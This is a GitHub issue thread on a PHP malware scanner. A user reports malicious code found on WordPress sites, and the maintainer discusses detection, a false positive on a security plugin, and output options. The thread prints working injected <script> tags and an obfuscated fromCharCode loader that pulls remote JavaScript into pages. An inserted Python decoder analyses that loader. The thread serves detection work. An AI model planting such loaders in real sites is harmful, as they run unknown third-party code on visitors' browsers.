scr34m / php-malware-scanner

Scans PHP files for malwares and known threats
GNU General Public License v3.0

malware samples #54

Closed darkworks closed 4 years ago

darkworks commented 4 years ago

Hi, here are some samples of malicious code I found during cleaning up a few WordPress sites. I think it will be good to add them to the tool.

<script type='text/javascript' src='https://snippet.adsformarket.com/same.js'></script>

<script type="text/javascript" src="//deloplen.com/apu.php?zoneid=2857365" async data-cfasync="false"></script>
<script src="//pushosubk.com/ntfc.php?p=2857367" data-cfasync="false" async></script>
<script type='text/javascript' src='https://snippet.adsformarket.com/same.js'></script>

var gfjfgjk = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript'; s.async=true; var pl = String.fromCharCode(104,116,116,112,115,58,47,47,115,110,105,112,112,101,116,46,97,100,115,102,111,114,109,97,114,107,101,116,46,99,111,109,47,115,97,109,101,46,106,115,63,118,61,51); s.src=pl; if (document.currentScript) { document.currentScript.parentNode.insertBefore(s, document.currentScript); } else { d.getElementsByTagName('head')[0].appendChild(s); }

Also, I noticed the tool triggers on a top WordPress plugin: sucuri-scanner

# ER # /wp-content/plugins/sucuri-scanner/src/base.lib.php}
# ER # /wp-content/plugins/sucuri-scanner/src/sitecheck.lib.php}
# ER # /wp-content/plugins/sucuri-scanner/src/integrity.lib.php}

sample 1.zip sample 2.zip
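As an added illustration (not code from the repository or from either commenter), the `String.fromCharCode` sample above can be decoded statically, without executing any JavaScript, so a reviewer can compare the hidden host against the hosts named in the plain `<script src=...>` tags. The sample text is the snippet from this comment embedded as a constant; the regexes and function names are assumptions of this example.

```python
import re
from typing import List

# Constructed sample: the obfuscated loader posted in this issue, which builds
# the script URL one character code at a time.
SAMPLE = (
    "var gfjfgjk = 1; var d=document;var s=d.createElement('script'); "
    "s.type='text/javascript'; s.async=true; var pl = String.fromCharCode("
    "104,116,116,112,115,58,47,47,115,110,105,112,112,101,116,46,97,100,115,"
    "102,111,114,109,97,114,107,101,116,46,99,111,109,47,115,97,109,101,46,"
    "106,115,63,118,61,51); s.src=pl;"
)

# String.fromCharCode(...) with only literal integer arguments.
FROMCHARCODE = re.compile(r"String\.fromCharCode\s*\(([\d\s,]+)\)")
# src attribute of a <script> tag, either quote style.
SCRIPT_SRC = re.compile(r"<script[^>]*\ssrc=['\"]([^'\"]+)['\"]", re.I)


def decode_fromcharcode(text: str) -> List[str]:
    """Return every string a literal String.fromCharCode(...) call would
    produce. Decoding is purely static: nothing from the input is executed."""
    decoded = []
    for m in FROMCHARCODE.finditer(text):
        codes = [int(c) for c in m.group(1).split(",") if c.strip()]
        decoded.append("".join(chr(c) for c in codes))
    return decoded


def external_script_hosts(text: str) -> List[str]:
    """Hosts loaded by <script src=...> tags plus hosts hidden inside
    fromCharCode-built URLs, deduplicated in order of appearance, so they
    can be checked against the domains a site is expected to load from."""
    urls = SCRIPT_SRC.findall(text)
    urls += [s for s in decode_fromcharcode(text)
             if "://" in s or s.startswith("//")]
    hosts: List[str] = []
    for url in urls:
        host = re.sub(r"^(https?:)?//", "", url).split("/")[0]
        if host and host not in hosts:
            hosts.append(host)
    return hosts
```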

scr34m commented 4 years ago

I'm afraid that a URL check is not possible, only code sample matches, and we check only PHP in the first place.

For the sucuri-scanner, please provide a release site where I can download it and generate a hash for whitelisting.

scr34m commented 4 years ago

Let me check the attached archives and soon I will update the database, thanks.

scr34m commented 4 years ago

Only 2 of the samples are not detected, are you using an up-to-date version?

# ER # {/sample 2/search.php}
# ER # {/sample 2/pas.php}
# ER # {/sample 2/s_eval.php}
# ER # {/sample 2/accesson.php}
# ER # {/sample 2/s_noeval.php}
# ER # {/sample 1/wp-mailing.php}
# ER # {/sample 1/wp-vcd.php}
# OK # {/sample 1/index.php}
# ER # {/sample 1/cache-ssxelgwcnhoxnfoc.php}
# ER # {/sample 1/cache-ztopvwnwtfqnsefb.php}
# ER # {/sample 1/wp-craft-report.php}
# OK # {/sample 1/wp-tmp.php}

scr34m commented 4 years ago

I see the SCRIPT tags, but these domains change frequently and currently I don't know any database to check against, because with a new flag we could send them to check.

Found this https://hybrid-analysis.com/sample/8afc3ad8b29ed3695dc0f0ddecfb592560d22f95cdeb95fc5293633c63b43261?environmentId=100 for pushosubk.com/ntfc.php?p=2857367 and they have a public API, so we can implement a query for them with a provided API key https://hybrid-analysis.com/docs/api/v2

scr34m commented 4 years ago

Not listed:

So this only works when users report URLs.

darkworks commented 4 years ago

sucuri-scanner

OK, here is the download link of the Sucuri scanner: https://wordpress.org/plugins/sucuri-scanner/

darkworks commented 4 years ago

> Only 2 of the samples are not detected, are you using an up-to-date version?
>
> # ER # {/sample 2/search.php}
> # ER # {/sample 2/pas.php}
> # ER # {/sample 2/s_eval.php}
> # ER # {/sample 2/accesson.php}
> # ER # {/sample 2/s_noeval.php}
> # ER # {/sample 1/wp-mailing.php}
> # ER # {/sample 1/wp-vcd.php}
> # OK # {/sample 1/index.php}
> # ER # {/sample 1/cache-ssxelgwcnhoxnfoc.php}
> # ER # {/sample 1/cache-ztopvwnwtfqnsefb.php}
> # ER # {/sample 1/wp-craft-report.php}
> # OK # {/sample 1/wp-tmp.php}

Yeah, I just came across it and cloned it from GitHub today.

darkworks commented 4 years ago

One question: can we write the output to a file? I think there is no flag for file output. Where there are a lot of matches, the output is hidden by SSH clients like PuTTY; they shrink the output on the terminal. So it will be good to have a write-to-file flag.

scr34m commented 4 years ago

You can use "--output-format" to change the format so no special characters will do any harm, and also only piping the output; currently there is no option for file logging.

darkworks commented 4 years ago

OK, great.

scr34m commented 4 years ago

Whitelist updated with the recent version of sucuri-scanner.